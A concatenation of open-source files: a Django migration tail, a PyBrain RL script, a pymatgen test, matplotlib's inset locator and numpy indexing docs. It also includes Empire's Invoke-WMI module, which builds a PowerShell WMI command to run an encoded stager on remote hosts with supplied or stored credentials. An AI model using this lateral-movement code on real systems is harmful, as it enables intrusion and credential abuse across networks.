            field=models.ForeignKey(related_name='moderationreport', on_delete=django.db.models.deletion.SET_NULL, to='api.Activity', null=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='moderationreport',
            name='fake_user',
            field=models.ForeignKey(related_name='moderationreport', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True),
            preserve_default=True,
        ),
    ]
| apache-2.0 |
taylorhxu/pybrain | examples/rl/environments/shipsteer/shipbench_sde.py | 26 | 3454 | from __future__ import print_function
#!/usr/bin/env python
#########################################################################
# Reinforcement Learning with SPE on the ShipSteering Environment
#
# Requirements:
#   pybrain (tested on rev. 1195, ship env rev. 1202)
# Synopsis:
#   shipbenchm.py [<True|False> [logfile]]
# (first argument is graphics flag, second is optional history logfile)
#########################################################################
__author__ = "Martin Felder, Thomas Rueckstiess"
__version__ = '$Id$'

#---
# default backend GtkAgg does not plot properly on Ubuntu 8.04
import matplotlib
matplotlib.use('TkAgg')
#---
from pybrain.rl.environments.shipsteer import ShipSteeringEnvironment
from pybrain.rl.environments.shipsteer import GoNorthwardTask
from pybrain.rl.agents import LearningAgent
from pybrain.rl.learners.directsearch.enac import ENAC
from pybrain.rl.experiments.episodic import EpisodicExperiment
from pybrain.tools.shortcuts import buildNetwork
from pybrain.tools.plotting import MultilinePlotter

from pylab import figure, ion
from scipy import mean
import sys

# First CLI argument toggles live plotting of the learning curve.
if len(sys.argv) > 1:
    useGraphics = eval(sys.argv[1])
else:
    useGraphics = False

# create task
env = ShipSteeringEnvironment()
maxsteps = 500
task = GoNorthwardTask(env=env, maxsteps=maxsteps)
# task.env.setRenderer( CartPoleRenderer())

# create controller network
#net = buildNetwork(task.outdim, 7, task.indim, bias=True, outputbias=False)
net = buildNetwork(task.outdim, task.indim, bias=False)
#net.initParams(0.0)

# create agent
learner = ENAC()
learner.gd.rprop = True
# only relevant for RP
learner.gd.deltamin = 0.0001
#agent.learner.gd.deltanull = 0.05
# only relevant for BP
learner.gd.alpha = 0.01
learner.gd.momentum = 0.9
agent = LearningAgent(net, learner)
agent.actaspg = False

# create experiment
experiment = EpisodicExperiment(task, agent)

# print weights at beginning
print(agent.module.params)

rewards = []
if useGraphics:
    figure()
    ion()
    pl = MultilinePlotter(autoscale=1.2, xlim=[0, 50], ylim=[0, 1])
    pl.setLineStyle(linewidth=2)

# queued version
# experiment._fillQueue(30)
# while True:
#     experiment._stepQueueLoop()
#     # rewards.append(mean(agent.history.getSumOverSequences('reward')))
#     print agent.module.getParameters(),
#     print mean(agent.history.getSumOverSequences('reward'))
#     clf()
#     plot(rewards)

# episodic version
x = 0
batch = 30  # number of samples per gradient estimate (was: 20; more here due to stochastic setting)
while x < 5000:
    #while True:
    experiment.doEpisodes(batch)
    x += batch
    reward = mean(agent.history.getSumOverSequences('reward')) * task.rewardscale
    if useGraphics:
        pl.addData(0, x, reward)
    print(agent.module.params)
    print(reward)
    #if reward > 3:
    #    pass
    agent.learn()
    agent.reset()
    if useGraphics:
        pl.update()

# BUGFIX: the optional logfile is the *second* CLI argument (argv[2]);
# the original passed argv[1] (the graphics flag) as the filename even
# though the guard correctly checks for len(sys.argv) > 2.
if len(sys.argv) > 2:
    agent.history.saveToFile(sys.argv[2], protocol=-1, arraysonly=True)

if useGraphics:
    pl.show(popup=True)

#To view what the simulation is doing at the moment set the environment with True, go to pybrain/rl/environments/ode/ and start viewer.py (python-openGL musst be installed, see PyBrain documentation)

## performance:
## experiment.doEpisodes(5) * 100 without weave:
## real    2m39.683s
## user    2m33.358s
## sys     0m5.960s
## experiment.doEpisodes(5) * 100 with weave:
##real    2m41.275s
##user    2m35.310s
##sys     0m5.192s
##
dongsenfo/pymatgen | pymatgen/core/tests/test_xcfunc.py | 3 | 2615 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from pymatgen.util.testing import PymatgenTest
from pymatgen.core.xcfunc import XcFunc
class LibxcFuncTest(PymatgenTest):
    """Unit tests for the public API of pymatgen.core.xcfunc.XcFunc."""
    def test_xcfunc_api(self):
        """Testing XcFunc API."""
        # Aliases should be unique
        assert len(XcFunc.aliases()) == len(set(XcFunc.aliases()))
        # LDA-Teter
        ixc_1 = XcFunc.from_abinit_ixc(1)
        print(ixc_1)
        assert ixc_1.type == "LDA"
        assert ixc_1.name == "LDA_XC_TETER93"
        # Equality must work against both XcFunc instances and plain names.
        assert ixc_1 == ixc_1
        assert ixc_1 == "LDA_XC_TETER93"
        assert ixc_1 != "PBE"
        assert ixc_1.name not in XcFunc.aliases()
        assert ixc_1 == XcFunc.from_name(ixc_1.name)
        # LDA-PW (in aliases)
        ixc_7 = XcFunc.from_abinit_ixc(7)
        assert ixc_7.type == "LDA"
        assert ixc_7.name == "PW"
        assert ixc_7.name in XcFunc.aliases()
        assert ixc_7.name == XcFunc.from_name(ixc_7.name)
        assert ixc_7 != ixc_1
        # GGA-PBE from ixc == 11 (in aliases)
        ixc_11 = XcFunc.from_abinit_ixc(11)
        assert ixc_11.type == "GGA" and ixc_11.name == "PBE"
        assert ixc_11.name in XcFunc.aliases()
        assert ixc_1 != ixc_11
        # Test asxc
        assert XcFunc.asxc(ixc_11) is ixc_11
        assert XcFunc.asxc("PBE") == ixc_11
        # XcFunc must be hashable and usable as a dict key, interchangeably
        # with its alias string.
        d = {ixc_11: ixc_11.name}
        print(d)
        assert "PBE" in d
        assert ixc_11 in d
        # Test if object can be serialized with Pickle.
        self.serialize_with_pickle(ixc_11, test_eq=True)
        # Test if object supports MSONable
        # TODO
        #print("in test", type(ixc_11.x), type(ixc_11.c), type(ixc_11.xc))
        #ixc_11.x.as_dict()
        #self.assertMSONable(ixc_11)
        # GGA-PBE from ixc given in abinit-libxc mode
        ixc_101130 = XcFunc.from_abinit_ixc(-101130)
        assert ixc_101130.type == "GGA" and ixc_101130.name == "PBE"
        assert ixc_101130 == ixc_11
        # GGA-PBE built from name
        gga_pbe = XcFunc.from_name("PBE")
        assert gga_pbe.type == "GGA" and gga_pbe.name == "PBE"
        assert ixc_11 == gga_pbe
        # Use X from GGA and C from LDA!
        unknown_xc = XcFunc.from_name("GGA_X_PBE+ LDA_C_PW")
        assert unknown_xc not in XcFunc.aliases()
        assert unknown_xc.type == "GGA+LDA"
        assert unknown_xc.name == "GGA_X_PBE+LDA_C_PW"
        gga_pbe = XcFunc.from_type_name("GGA", "GGA_X_PBE+GGA_C_PBE")
        assert gga_pbe.type == "GGA" and gga_pbe.name == "PBE"
        assert str(gga_pbe) == "PBE"
| mit |
cactusbin/nyt | matplotlib/lib/mpl_toolkits/axes_grid1/inset_locator.py | 6 | 9604 | from matplotlib.offsetbox import AnchoredOffsetbox
#from matplotlib.transforms import IdentityTransform
import matplotlib.transforms as mtrans
#from matplotlib.axes import Axes
from mpl_axes import Axes
from matplotlib.transforms import Bbox, TransformedBbox, IdentityTransform
from matplotlib.patches import Patch
from matplotlib.path import Path
from matplotlib.patches import Rectangle
class InsetPosition(object):
    """Axes locator that places an inset at a fixed (left, bottom, width,
    height) rectangle given in normalized coordinates of a parent axes."""
    def __init__(self, parent, lbwh):
        # lbwh: position of the inset axes in the normalized coordinate
        # of the parent axes
        self.parent = parent
        self.lbwh = lbwh
    def __call__(self, ax, renderer):
        """Return the inset's bounding box in figure coordinates."""
        parent_bbox = self.parent.get_position(original=False)
        to_parent = mtrans.BboxTransformTo(parent_bbox)
        inset_bbox = mtrans.Bbox.from_bounds(*self.lbwh)
        return mtrans.TransformedBbox(inset_bbox, to_parent)
class AnchoredLocatorBase(AnchoredOffsetbox):
    # Base class for axes locators that reuse the AnchoredOffsetbox
    # machinery to position an inset axes relative to an anchor bbox.
    def __init__(self, bbox_to_anchor, offsetbox, loc,
                 borderpad=0.5, bbox_transform=None):
        super(AnchoredLocatorBase, self).__init__(loc,
                                                  pad=0., child=None,
                                                  borderpad=borderpad,
                                                  bbox_to_anchor=bbox_to_anchor,
                                                  bbox_transform=bbox_transform)
    def draw(self, renderer):
        # A locator is never drawn as an artist; it is only *called* to
        # compute an axes position.
        raise RuntimeError("No draw method should be called")
    def __call__(self, ax, renderer):
        # Compute the inset's position: size from get_extent() (defined by
        # subclasses), placement from the anchored-offsetbox offset, then
        # convert the canvas-pixel bbox into figure coordinates.
        fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
        self._update_offset_func(renderer, fontsize)
        width, height, xdescent, ydescent = self.get_extent(renderer)
        px, py = self.get_offset(width, height, 0, 0, renderer)
        bbox_canvas = mtrans.Bbox.from_bounds(px, py, width, height)
        tr = ax.figure.transFigure.inverted()
        bb = mtrans.TransformedBbox(bbox_canvas, tr)
        return bb
import axes_size as Size
class AnchoredSizeLocator(AnchoredLocatorBase):
    """Anchored locator whose inset size comes from axes_size specifications."""
    def __init__(self, bbox_to_anchor, x_size, y_size, loc,
                 borderpad=0.5, bbox_transform=None):
        self.axes = None
        # Accept floats, percentage strings or Size instances alike.
        self.x_size = Size.from_any(x_size)
        self.y_size = Size.from_any(y_size)
        super(AnchoredSizeLocator, self).__init__(bbox_to_anchor, None, loc,
                                                  borderpad=borderpad,
                                                  bbox_transform=bbox_transform)
    def get_extent(self, renderer):
        # Each Size yields a (relative, absolute-in-inches) pair: the
        # relative part scales with the anchor bbox, the absolute part
        # with the renderer dpi.
        _, _, anchor_w, anchor_h = self.get_bbox_to_anchor().bounds
        dpi = renderer.points_to_pixels(72.)
        rel_w, abs_w = self.x_size.get_size(renderer)
        rel_h, abs_h = self.y_size.get_size(renderer)
        width = anchor_w * rel_w + abs_w * dpi
        height = anchor_h * rel_h + abs_h * dpi
        fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
        pad = self.pad * fontsize
        return width + 2 * pad, height + 2 * pad, pad, pad
    def __call__(self, ax, renderer):
        # Remember the axes being located, then defer to the base class.
        self.axes = ax
        return super(AnchoredSizeLocator, self).__call__(ax, renderer)
class AnchoredZoomLocator(AnchoredLocatorBase):
    """Anchored locator sized to *zoom* times the inset's view in parent data space."""
    def __init__(self, parent_axes, zoom, loc,
                 borderpad=0.5,
                 bbox_to_anchor=None,
                 bbox_transform=None):
        self.parent_axes = parent_axes
        self.zoom = zoom
        # Default anchor is the parent axes' own bbox.
        if bbox_to_anchor is None:
            bbox_to_anchor = parent_axes.bbox
        super(AnchoredZoomLocator, self).__init__(bbox_to_anchor, None, loc,
                                                  borderpad=borderpad,
                                                  bbox_transform=bbox_transform)
        self.axes = None
    def get_extent(self, renderer):
        # Extent of the inset's data limits as seen in the parent's data
        # space, scaled by the zoom factor and padded with pad*fontsize.
        data_box = mtrans.TransformedBbox(self.axes.viewLim,
                                          self.parent_axes.transData)
        _, _, w, h = data_box.bounds
        fontsize = renderer.points_to_pixels(self.prop.get_size_in_points())
        pad = self.pad * fontsize
        return w * self.zoom + 2 * pad, h * self.zoom + 2 * pad, pad, pad
    def __call__(self, ax, renderer):
        # Remember the axes being located, then defer to the base class.
        self.axes = ax
        return super(AnchoredZoomLocator, self).__call__(ax, renderer)
class BboxPatch(Patch):
    """A rectangular patch drawn around a bbox given in display coordinates."""
    def __init__(self, bbox, **kwargs):
        """
        *bbox* is a :class:`matplotlib.transforms.Bbox` in display space.

        The patch always uses the identity transform, so a *transform*
        keyword argument is rejected.
        """
        if "transform" in kwargs:
            raise ValueError("transform should not be set")
        kwargs["transform"] = IdentityTransform()
        Patch.__init__(self, **kwargs)
        self.bbox = bbox
    def get_path(self):
        # Trace the rectangle counter-clockwise and close the polygon.
        x0, y0, x1, y1 = self.bbox.extents
        corners = [(x0, y0), (x1, y0), (x1, y1), (x0, y1), (x0, y0), (0, 0)]
        codes = [Path.MOVETO] + [Path.LINETO] * 4 + [Path.CLOSEPOLY]
        return Path(corners, codes)
class BboxConnector(Patch):
    """A line patch connecting a corner of one bbox to a corner of another."""
    @staticmethod
    def get_bbox_edge_pos(bbox, loc):
        """
        Return the display coordinates of corner *loc* of *bbox*.

        *loc* follows the legend convention: 1 upper right, 2 upper left,
        3 lower left, 4 lower right.
        """
        x0, y0, x1, y1 = bbox.extents
        if loc == 1:
            return x1, y1
        elif loc == 2:
            return x0, y1
        elif loc == 3:
            return x0, y0
        elif loc == 4:
            return x1, y0
        # Previously fell through and returned None, producing a confusing
        # TypeError at the unpacking site; fail loudly and early instead.
        raise ValueError("loc must be 1, 2, 3 or 4, got %r" % (loc,))
    @staticmethod
    def connect_bbox(bbox1, bbox2, loc1, loc2=None):
        """
        Return a `Path` from corner *loc1* of *bbox1* to corner *loc2* of
        *bbox2*.  A `Rectangle` may be passed in place of either bbox, in
        which case its unit bbox transformed by the rectangle's transform
        is used.  If *loc2* is None, *loc1* is used for both ends.
        """
        if isinstance(bbox1, Rectangle):
            # BUG FIX: was bbox1.get_transfrom() (typo), which raised
            # AttributeError whenever a Rectangle was passed as bbox1.
            transform = bbox1.get_transform()
            bbox1 = Bbox.from_bounds(0, 0, 1, 1)
            bbox1 = TransformedBbox(bbox1, transform)
        if isinstance(bbox2, Rectangle):
            transform = bbox2.get_transform()
            bbox2 = Bbox.from_bounds(0, 0, 1, 1)
            bbox2 = TransformedBbox(bbox2, transform)
        if loc2 is None:
            loc2 = loc1
        x1, y1 = BboxConnector.get_bbox_edge_pos(bbox1, loc1)
        x2, y2 = BboxConnector.get_bbox_edge_pos(bbox2, loc2)
        verts = [[x1, y1], [x2, y2]]
        codes = [Path.MOVETO, Path.LINETO]
        return Path(verts, codes)
    def __init__(self, bbox1, bbox2, loc1, loc2=None, **kwargs):
        """
        Connect corner *loc1* of *bbox1* with corner *loc2* of *bbox2*.

        The patch always uses the identity transform, so a *transform*
        keyword argument is rejected.

        Valid kwargs are:
        %(Patch)s
        .. seealso::
            :class:`Patch`
                For additional kwargs
        """
        if "transform" in kwargs:
            raise ValueError("transform should not be set")
        kwargs["transform"] = IdentityTransform()
        Patch.__init__(self, **kwargs)
        self.bbox1 = bbox1
        self.bbox2 = bbox2
        self.loc1 = loc1
        self.loc2 = loc2
    def get_path(self):
        # The connecting path is recomputed on every draw so it tracks
        # any changes in the underlying (transformed) bboxes.
        return self.connect_bbox(self.bbox1, self.bbox2,
                                 self.loc1, self.loc2)
class BboxConnectorPatch(BboxConnector):
    """A filled patch bounded by two connector lines between two bboxes."""
    def __init__(self, bbox1, bbox2, loc1a, loc2a, loc1b, loc2b, **kwargs):
        if "transform" in kwargs:
            raise ValueError("transform should not be set")
        # The first connector (loc1a -> loc2a) is stored by the base
        # class as loc1/loc2; only the second pair is kept here.
        BboxConnector.__init__(self, bbox1, bbox2, loc1a, loc2a, **kwargs)
        self.loc1b = loc1b
        self.loc2b = loc2b
    def get_path(self):
        # Walk bbox1 -> bbox2 along the first connector, back along the
        # second, then close the loop at the starting vertex.
        forward = self.connect_bbox(self.bbox1, self.bbox2, self.loc1, self.loc2)
        backward = self.connect_bbox(self.bbox2, self.bbox1, self.loc2b, self.loc1b)
        vertices = list(forward.vertices) + list(backward.vertices)
        vertices.append(forward.vertices[0])
        return Path(vertices)
def _add_inset_axes(parent_axes, inset_axes):
    # Register the inset on the parent's figure and disable interactive
    # pan/zoom navigation for it (the inset is positioned by its locator).
    parent_axes.figure.add_axes(inset_axes)
    inset_axes.set_navigate(False)
def inset_axes(parent_axes, width, height, loc=1,
               bbox_to_anchor=None, bbox_transform=None,
               axes_class=None,
               axes_kwargs=None,
               **kwargs):
    """
    Create an inset axes of the given *width* and *height*, anchored at
    the legend-style location *loc* of *parent_axes*.

    *axes_class*/*axes_kwargs* control construction of the inset axes;
    remaining keyword arguments are forwarded to `AnchoredSizeLocator`.
    Returns the new inset axes.
    """
    cls = Axes if axes_class is None else axes_class
    extra_kw = {} if axes_kwargs is None else axes_kwargs
    new_axes = cls(parent_axes.figure, parent_axes.get_position(), **extra_kw)
    anchor = parent_axes.bbox if bbox_to_anchor is None else bbox_to_anchor
    locator = AnchoredSizeLocator(anchor,
                                  width, height,
                                  loc=loc,
                                  bbox_transform=bbox_transform,
                                  **kwargs)
    new_axes.set_axes_locator(locator)
    _add_inset_axes(parent_axes, new_axes)
    return new_axes
def zoomed_inset_axes(parent_axes, zoom, loc=1,
                      bbox_to_anchor=None, bbox_transform=None,
                      axes_class=None,
                      axes_kwargs=None,
                      **kwargs):
    """
    Create an inset axes showing a zoomed view of *parent_axes*.

    The inset is sized to *zoom* times the extent of its own data limits
    as they appear in the parent's data space, anchored at the
    legend-style location *loc*.  Extra keyword arguments are forwarded
    to `AnchoredZoomLocator`.  Returns the new inset axes.
    """
    cls = Axes if axes_class is None else axes_class
    extra_kw = {} if axes_kwargs is None else axes_kwargs
    new_axes = cls(parent_axes.figure, parent_axes.get_position(), **extra_kw)
    locator = AnchoredZoomLocator(parent_axes, zoom=zoom, loc=loc,
                                  bbox_to_anchor=bbox_to_anchor,
                                  bbox_transform=bbox_transform,
                                  **kwargs)
    new_axes.set_axes_locator(locator)
    _add_inset_axes(parent_axes, new_axes)
    return new_axes
def mark_inset(parent_axes, inset_axes, loc1, loc2, **kwargs):
    """
    Draw a box on *parent_axes* around the region shown by *inset_axes*
    and connect it to the inset with lines at corners *loc1* and *loc2*.

    Returns ``(box_patch, connector1, connector2)``.
    """
    rect = TransformedBbox(inset_axes.viewLim, parent_axes.transData)
    box_patch = BboxPatch(rect, **kwargs)
    parent_axes.add_patch(box_patch)
    connectors = []
    for corner in (loc1, loc2):
        conn = BboxConnector(inset_axes.bbox, rect, loc1=corner, **kwargs)
        inset_axes.add_patch(conn)
        # Connectors run outside the inset; clipping would hide them.
        conn.set_clip_on(False)
        connectors.append(conn)
    return box_patch, connectors[0], connectors[1]
| unlicense |
zhuyue1314/Empire | lib/modules/lateral_movement/invoke_wmi.py | 22 | 5567 | from lib.common import helpers
class Module:
    """
    Empire lateral-movement module that launches an Empire stager on
    remote hosts via WMI (Invoke-WmiMethod -Path Win32_process -Name create).
    """
    # NOTE(review): mutable default argument ``params=[]``; harmless here
    # because params is only iterated, never mutated — confirm upstream.
    def __init__(self, mainMenu, params=[]):
        # Static metadata shown to the operator in the Empire UI.
        self.info = {
            'Name': 'Invoke-WMI',
            'Author': ['@harmj0y'],
            'Description': ('Executes a stager on remote hosts using WMI.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'MinPSVersion' : '2',
            'Comments': []
        }
        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'CredID' : {
                'Description' : 'CredID from the store to use.',
                'Required' : False,
                'Value' : ''
            },
            'ComputerName' : {
                'Description' : 'Host[s] to execute the stager on, comma separated.',
                'Required' : True,
                'Value' : ''
            },
            'Listener' : {
                'Description' : 'Listener to use.',
                'Required' : True,
                'Value' : ''
            },
            'UserName' : {
                'Description' : '[domain\]username to use to execute command.',
                'Required' : False,
                'Value' : ''
            },
            'Password' : {
                'Description' : 'Password to use to execute command.',
                'Required' : False,
                'Value' : ''
            },
            'UserAgent' : {
                'Description' : 'User-agent string to use for the staging request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'Proxy' : {
                'Description' : 'Proxy to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'ProxyCreds' : {
                'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            }
        }
        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu
        # Apply any option overrides supplied at construction time.
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
    def generate(self):
        """
        Build and return the PowerShell command string that launches the
        stager on the remote host(s) via WMI.  Returns "" on any error
        (invalid CredID, invalid listener, or empty launcher).
        """
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        userName = self.options['UserName']['Value']
        password = self.options['Password']['Value']
        script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
        # if a credential ID is specified, try to parse
        credID = self.options["CredID"]['Value']
        if credID != "":
            if not self.mainMenu.credentials.is_credential_valid(credID):
                print helpers.color("[!] CredID is invalid!")
                return ""
            # Overwrite userName/password (and the stored options) with the
            # credential-store entry.
            (credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
            if domainName != "":
                self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
            else:
                self.options["UserName"]['Value'] = str(userName)
            if password != "":
                self.options["Password"]['Value'] = password
        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""
        else:
            # generate the PowerShell one-liner with all of the proper options set
            launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
            if launcher == "":
                return ""
            else:
                stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
                # build the WMI execution string
                computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
                script += " -ComputerName @("+computerNames+")"
                script += " -ArgumentList \"" + stagerCode + "\""
                # if we're supplying alternate user credentials
                if userName != '':
                    # NOTE(review): userName here is the local variable, which
                    # the CredID branch may have replaced — confirm intended.
                    script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
                script += ";'Invoke-Wmi executed on " +computerNames +"'"
                return script
| bsd-3-clause |
mariosky/evo-drawings | venv/lib/python2.7/site-packages/numpy/doc/indexing.py | 52 | 15441 | """
==============
Array indexing
==============
Array indexing refers to any use of the square brackets ([]) to index
array values. There are many options to indexing, which give numpy
indexing great power, but with power comes some complexity and the
potential for confusion. This section is just an overview of the
various options and issues related to indexing. Aside from single
element indexing, the details on most of these options are to be
found in related sections.
Assignment vs referencing
=========================
Most of the following examples show the use of indexing when
referencing data in an array. The examples work just as well
when assigning to an array. See the section at the end for
specific examples and explanations on how assignments work.
Single element indexing
=======================
Single element indexing for a 1-D array is what one expects. It work
exactly like that for other standard Python sequences. It is 0-based,
and accepts negative indices for indexing from the end of the array. ::
>>> x = np.arange(10)
>>> x[2]
2
>>> x[-2]
8
Unlike lists and tuples, numpy arrays support multidimensional indexing
for multidimensional arrays. That means that it is not necessary to
separate each dimension's index into its own set of square brackets. ::
>>> x.shape = (2,5) # now x is 2-dimensional
>>> x[1,3]
8
>>> x[1,-1]
9
Note that if one indexes a multidimensional array with fewer indices
than dimensions, one gets a subdimensional array. For example: ::
>>> x[0]
array([0, 1, 2, 3, 4])
That is, each index specified selects the array corresponding to the
rest of the dimensions selected. In the above example, choosing 0
means that the remaining dimension of length 5 is being left unspecified,
and that what is returned is an array of that dimensionality and size.
It must be noted that the returned array is not a copy of the original,
but points to the same values in memory as does the original array.
In this case, the 1-D array at the first position (0) is returned.
So using a single index on the returned array, results in a single
element being returned. That is: ::
>>> x[0][2]
2
So note that ``x[0,2] == x[0][2]``, though the second case is more
inefficient, as a new temporary array is created after the first index
that is subsequently indexed by 2.
Note to those used to IDL or Fortran memory order as it relates to
indexing. Numpy uses C-order indexing. That means that the last
index usually represents the most rapidly changing memory location,
unlike Fortran or IDL, where the first index represents the most
rapidly changing location in memory. This difference represents a
great potential for confusion.
Other indexing options
======================
It is possible to slice and stride arrays to extract arrays of the
same number of dimensions, but of different sizes than the original.
The slicing and striding works exactly the same way it does for lists
and tuples except that they can be applied to multiple dimensions as
well. A few examples illustrates best: ::
>>> x = np.arange(10)
>>> x[2:5]
array([2, 3, 4])
>>> x[:-7]
array([0, 1, 2])
>>> x[1:7:2]
array([1, 3, 5])
>>> y = np.arange(35).reshape(5,7)
>>> y[1:5:2,::3]
array([[ 7, 10, 13],
[21, 24, 27]])
Note that slices of arrays do not copy the internal array data but
also produce new views of the original data.
It is possible to index arrays with other arrays for the purposes of
selecting lists of values out of arrays into new arrays. There are
two different ways of accomplishing this. One uses one or more arrays
of index values. The other involves giving a boolean array of the proper
shape to indicate the values to be selected. Index arrays are a very
powerful tool that allow one to avoid looping over individual elements in
arrays and thus greatly improve performance.
It is possible to use special features to effectively increase the
number of dimensions in an array through indexing so the resulting
array acquires the shape needed for use in an expression or with a
specific function.
Index arrays
============
Numpy arrays may be indexed with other arrays (or any other sequence-
like object that can be converted to an array, such as lists, with the
exception of tuples; see the end of this document for why this is). The
use of index arrays ranges from simple, straightforward cases to
complex, hard-to-understand cases. For all cases of index arrays, what
is returned is a copy of the original data, not a view as one gets for
slices.
Index arrays must be of integer type. Each value in the array indicates
which value in the array to use in place of the index. To illustrate: ::
>>> x = np.arange(10,1,-1)
>>> x
array([10, 9, 8, 7, 6, 5, 4, 3, 2])
>>> x[np.array([3, 3, 1, 8])]
array([7, 7, 9, 2])
The index array consisting of the values 3, 3, 1 and 8 correspondingly
create an array of length 4 (same as the index array) where each index
is replaced by the value the index array has in the array being indexed.
Negative values are permitted and work as they do with single indices
or slices: ::
>>> x[np.array([3,3,-3,8])]
array([7, 7, 4, 2])
It is an error to have index values out of bounds: ::
>>> x[np.array([3, 3, 20, 8])]
<type 'exceptions.IndexError'>: index 20 out of bounds 0<=index<9
Generally speaking, what is returned when index arrays are used is
an array with the same shape as the index array, but with the type
and values of the array being indexed. As an example, we can use a
multidimensional index array instead: ::
>>> x[np.array([[1,1],[2,3]])]
array([[9, 9],
[8, 7]])
Indexing Multi-dimensional arrays
=================================
Things become more complex when multidimensional arrays are indexed,
particularly with multidimensional index arrays. These tend to be
more unusual uses, but they are permitted, and they are useful for some
problems. We'll start with the simplest multidimensional case (using
the array y from the previous examples): ::
>>> y[np.array([0,2,4]), np.array([0,1,2])]
array([ 0, 15, 30])
In this case, if the index arrays have a matching shape, and there is
an index array for each dimension of the array being indexed, the
resultant array has the same shape as the index arrays, and the values
correspond to the index set for each position in the index arrays. In
this example, the first index value is 0 for both index arrays, and
thus the first value of the resultant array is y[0,0]. The next value
is y[2,1], and the last is y[4,2].
If the index arrays do not have the same shape, there is an attempt to
broadcast them to the same shape. If they cannot be broadcast to the
same shape, an exception is raised: ::
>>> y[np.array([0,2,4]), np.array([0,1])]
<type 'exceptions.ValueError'>: shape mismatch: objects cannot be
broadcast to a single shape
The broadcasting mechanism permits index arrays to be combined with
scalars for other indices. The effect is that the scalar value is used
for all the corresponding values of the index arrays: ::
>>> y[np.array([0,2,4]), 1]
array([ 1, 15, 29])
Jumping to the next level of complexity, it is possible to only
partially index an array with index arrays. It takes a bit of thought
to understand what happens in such cases. For example if we just use
one index array with y: ::
>>> y[np.array([0,2,4])]
array([[ 0, 1, 2, 3, 4, 5, 6],
[14, 15, 16, 17, 18, 19, 20],
[28, 29, 30, 31, 32, 33, 34]])
What results is the construction of a new array where each value of
the index array selects one row from the array being indexed and the
resultant array has the resulting shape (size of row, number index
elements).
An example of where this may be useful is for a color lookup table
where we want to map the values of an image into RGB triples for
display. The lookup table could have a shape (nlookup, 3). Indexing
such an array with an image with shape (ny, nx) with dtype=np.uint8
(or any integer type so long as values are with the bounds of the
lookup table) will result in an array of shape (ny, nx, 3) where a
triple of RGB values is associated with each pixel location.
In general, the shape of the resultant array will be the concatenation
of the shape of the index array (or the shape that all the index arrays
were broadcast to) with the shape of any unused dimensions (those not
indexed) in the array being indexed.
Boolean or "mask" index arrays
==============================
Boolean arrays used as indices are treated in a different manner
entirely than index arrays. Boolean arrays must be of the same shape
as the initial dimensions of the array being indexed. In the
most straightforward case, the boolean array has the same shape: ::
>>> b = y>20
>>> y[b]
array([21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34])
The result is a 1-D array containing all the elements in the indexed
array corresponding to all the true elements in the boolean array. As
with index arrays, what is returned is a copy of the data, not a view
as one gets with slices.
The result will be multidimensional if y has more dimensions than b.
For example: ::
>>> b[:,5] # use a 1-D boolean whose first dim agrees with the first dim of y
array([False, False, False, True, True], dtype=bool)
>>> y[b[:,5]]
array([[21, 22, 23, 24, 25, 26, 27],
[28, 29, 30, 31, 32, 33, 34]])
Here the 4th and 5th rows are selected from the indexed array and
combined to make a 2-D array.
In general, when the boolean array has fewer dimensions than the array
being indexed, this is equivalent to y[b, ...], which means
y is indexed by b followed by as many : as are needed to fill
out the rank of y.
Thus the shape of the result is one dimension containing the number
of True elements of the boolean array, followed by the remaining
dimensions of the array being indexed.
For example, using a 2-D boolean array of shape (2,3)
with four True elements to select rows from a 3-D array of shape
(2,3,5) results in a 2-D result of shape (4,5): ::
>>> x = np.arange(30).reshape(2,3,5)
>>> x
array([[[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14]],
[[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]]])
>>> b = np.array([[True, True, False], [False, True, True]])
>>> x[b]
array([[ 0, 1, 2, 3, 4],
[ 5, 6, 7, 8, 9],
[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]])
For further details, consult the numpy reference documentation on array indexing.
Combining index arrays with slices
==================================
Index arrays may be combined with slices. For example: ::
>>> y[np.array([0,2,4]),1:3]
array([[ 1, 2],
[15, 16],
[29, 30]])
In effect, the slice is converted to an index array
np.array([[1,2]]) (shape (1,2)) that is broadcast with the index array
to produce a resultant array of shape (3,2).
Likewise, slicing can be combined with broadcasted boolean indices: ::
>>> y[b[:,5],1:3]
array([[22, 23],
[29, 30]])
Structural indexing tools
=========================
To facilitate easy matching of array shapes with expressions and in
